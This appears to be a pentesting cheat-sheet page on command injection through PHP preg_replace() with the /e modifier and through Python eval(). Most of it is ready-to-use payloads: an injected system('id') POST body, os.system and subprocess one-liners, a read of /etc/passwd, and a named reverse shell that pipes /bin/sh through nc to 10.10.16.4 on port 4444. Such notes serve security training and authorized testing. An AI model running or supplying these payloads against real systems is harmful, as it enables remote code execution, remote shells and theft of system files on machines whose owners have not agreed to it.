Command Injection

PHP - preg_replace()

  • Used in PHP to perform regular expression-based replacements.

    • Syntax: preg_replace(pattern, replacement, subject);

    • If the /e modifier (or PREG_REPLACE_EVAL) is used, the replacement string can be executed as PHP code before the replacement occurs.

Attack Technique

  • While the /e modifier may not be explicitly present in the original code, it can be injected into the regular expression pattern through user input.

  • If user input is used directly in the preg_replace() function, attackers can manipulate requests to inject the /e modifier into the pattern, causing arbitrary PHP code execution.

  • Look for regex patterns on POST requests (/)

  • Some payload examples:

Intercepted POST request
pattern=%2Fx%2Fe&ipaddress=system("id")&text=x
Plain PHP
preg_replace(/x/e, system("id"), x)
Python - eval()

The vulnerability arises from unsanitized user input being passed to the eval() function.

Payloads

__import__('os').system('your_command_here')
Reverse Shell
__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 4444 >/tmp/f')
Using subprocess
__import__('subprocess').call(['ls', '-la'])
File Operations
open('/etc/passwd').read()
Subprocess with Output Capture
__import__('subprocess').Popen('whoami', shell=True, stdout=__import__('subprocess').PIPE).communicate()[0]

PreviousServer-Side AttacksNextSSRF

Last updated